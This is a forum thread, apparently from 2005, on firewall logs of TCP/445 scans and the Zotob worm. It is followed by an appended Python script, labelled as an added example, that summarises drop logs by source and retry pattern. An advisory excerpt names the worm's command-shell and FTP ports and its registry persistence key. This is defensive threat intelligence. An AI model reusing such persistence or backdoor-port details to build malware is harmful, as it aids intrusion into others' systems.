02:57:59 Drop TCP packet from WAN 71.114.2.132:1200 71.114.86.x:445 Rule: Bad deny
02:57:55 Drop TCP packet from WAN 71.114.2.132:1200 71.114.86.x:445 Rule: Bad deny
02:57:40 Drop TCP packet from WAN 71.114.98.14:3385 71.114.86.x:445 Rule: Bad deny
02:57:36 Drop TCP packet from WAN 71.114.98.14:3385 71.114.86.x:445 Rule: Bad deny
02:53:43 Drop TCP packet from WAN 71.114.178.114:4195 71.114.86.x:445 Rule: Bad deny
02:53:39 Drop TCP packet from WAN 71.114.178.114:4195 71.114.86.x:445 Rule: Bad deny
02:52:08 Drop TCP packet from WAN 71.114.57.180:2968 71.114.86.x:445 Rule: Bad deny
02:52:04 Drop TCP packet from WAN 71.114.57.180:2968 71.114.86.x:445 Rule: Bad deny

That's just a sample of what I get 24/7. As far as trends go: I've noticed a shift from primarily 135 with a few 445 thrown in to a fair mix of both 135 and 445. The infected system almost always attempts the exploit twice, waiting approximately 4 seconds in between attempts. I'd say 90-95% are from the same /16. If you look at the above log, you'll notice the only one that doesn't come from Verizon's network is 68.206.76.231 and that it was a simple attempt only. I'd bet he was actively scanning, not infected himself. I'd say 1% of attempts fall in that category. It's unfortunate that ISPs do nothing about these blatantly infected systems. |
deadi Premium Member join:2001-08-26 Perry, OH |
to Link Logger
http://isc.sans.org/ has some info on the latest 445 vulnerability:
F-Secure is reporting a new variant in the Zotob worm currently exploiting the PnP vulnerability addressed in MS05-039. The Zotob.B variant uses the same ports (TCP/445 for scanning, TCP/8888 command shell on exploited systems, TCP/33333 for FTP server) as the previous variant, but uses the executable name "csm.exe" with the description "csm Win Updates" in the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices to load the worm when the system boots. The Zotob.A uses the executable name "botzor.exe" in the same registry key.
It is not believed that Zotob.B worm possesses any additional characteristics that would make it more of a threat compared to Zotob.A. |
I have seen an increase of 445 traffic by about 60 - 70%, but almost 94% of it is from my local netblock, which would tend to indicate that what is attacking 445 here was an email-borne virus, as with such tight local scanning it wouldn't spread very well breadth-wise on the internet. I have attached a number of graphs so people can see what 445 attack rates I'm seeing here. Of course your mileage may vary.
Blake

Edit -> one thing that I am interested in is the 143 traffic; anyone else seeing scans to TCP port 143? I did see one scan to TCP port 8888 on Saturday night, which was interesting given the release of information concerning TCP port 8888 lately:
Aug 13, 2005 23:23:11.031 - (TCP) 222.156.78.106 : 2623 >>> 68.144.129.205 : 8888
Aug 13, 2005 23:23:07.984 - (TCP) 222.156.78.106 : 2623 >>> 68.144.129.205 : 8888 |
Link Logger |
Perhaps this is having more of an effect than I first thought. From another IP address that I monitor I can see that the scans have gone up and such, but what is more interesting is that I typically see TCP port 445 attacks from about 270 different IP addresses per day (i.e. the attached chart from the 8th shows 2096 attacks from 270 addresses); on Monday I saw 7077 TCP port 445 attacks from 498 different sources, so the victim pool has almost been doubled, which is significant, and even more so considering the email version hasn't been released, as sometimes I think there are more insane users who blindly click on attachments than vulnerable systems. I wish I had some more time to look at everything, as there appears to be a couple of interesting things going on in terms of TCP port 445 attacks. I'll see what I can figure out and post my findings as I get them. Blake |
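The two things counted by hand in this thread, Mark75's double attempt from the same source about 4 seconds apart versus the single-shot scanner from outside the netblock, and Link Logger's attacks-versus-distinct-sources per day, automated over firewall drop lines in the layout Mark75 posted. This is an added example, not code from the thread or from any of the firewalls mentioned in it; SAMPLE_LOG is constructed from RFC 5737 documentation addresses, the masked destination "x" is accepted as in the posted lines, and the netblock to treat as local is a parameter rather than the /16 from the post.

```python
"""Summarise firewall drop logs for TCP/445 attack sources.

Added example, not code from the thread or from any firewall mentioned in
it. SAMPLE_LOG is constructed from RFC 5737 documentation addresses.
"""
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

SAMPLE_LOG = """\
03:04:11 Drop TCP packet from WAN 198.51.100.235:3377 198.51.100.x:445 Rule: Bad deny
03:03:32 Drop TCP packet from WAN 203.0.113.231:3952 198.51.100.x:445 Rule: Bad deny
02:57:59 Drop TCP packet from WAN 198.51.100.132:1200 198.51.100.x:445 Rule: Bad deny
02:57:55 Drop TCP packet from WAN 198.51.100.132:1200 198.51.100.x:445 Rule: Bad deny
02:57:40 Drop TCP packet from WAN 198.51.100.14:3385 198.51.100.x:445 Rule: Bad deny
02:57:36 Drop TCP packet from WAN 198.51.100.14:3385 198.51.100.x:445 Rule: Bad deny
"""

# time, protocol, source ip:port, destination ip:port (may be masked "x"), rule
LINE = re.compile(
    r"^(\d\d):(\d\d):(\d\d) Drop (\w+) packet from \w+ "
    r"(\d+\.\d+\.\d+\.\d+):(\d+) ([\d.x]+):(\d+) Rule: (.*)$"
)


def parse_log(text):
    """Parse drop lines into dicts, oldest first; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        h, mi, s = (int(x) for x in m.group(1, 2, 3))
        events.append({
            "t": h * 3600 + mi * 60 + s,        # seconds since midnight
            "proto": m.group(4),
            "src": m.group(5), "sport": int(m.group(6)),
            "dst": m.group(7), "dport": int(m.group(8)),
            "rule": m.group(9),
        })
    return sorted(events, key=lambda e: e["t"])


def summarize(events, local_net, dport=445, retry_window=5):
    """Group attempts on dport by source and classify each source."""
    net = ip_network(local_net)
    by_src = defaultdict(list)
    for e in events:
        if e["dport"] == dport:
            by_src[e["src"]].append(e)
    retrying, single, gaps = [], [], []
    for src, evs in by_src.items():
        retry = False
        # a retry is the same source port again within retry_window seconds,
        # the infected-host pattern; one attempt and silence is the scanner
        for a, b in zip(evs, evs[1:]):
            gap = b["t"] - a["t"]
            if a["sport"] == b["sport"] and 0 <= gap <= retry_window:
                retry = True
                gaps.append(gap)
        (retrying if retry else single).append(src)
    n = len(by_src)
    local = sum(1 for s in by_src if ip_address(s) in net)
    return {
        "attacks": sum(len(v) for v in by_src.values()),
        "distinct_sources": n,
        "local_share": local / n if n else 0.0,
        "retrying_sources": sorted(retrying),
        "single_attempt_sources": sorted(single),
        "retry_gaps": gaps,
    }


if __name__ == "__main__":
    summary = summarize(parse_log(SAMPLE_LOG), "198.51.100.0/24")
    for key, value in summary.items():
        print(f"{key}: {value}")
```

Run over a full day of drops, "attacks" and "distinct_sources" are the two numbers compared above (2096 from 270 versus 7077 from 498), and "local_share" is the fraction that the "almost 94% from my local netblock" observation is based on.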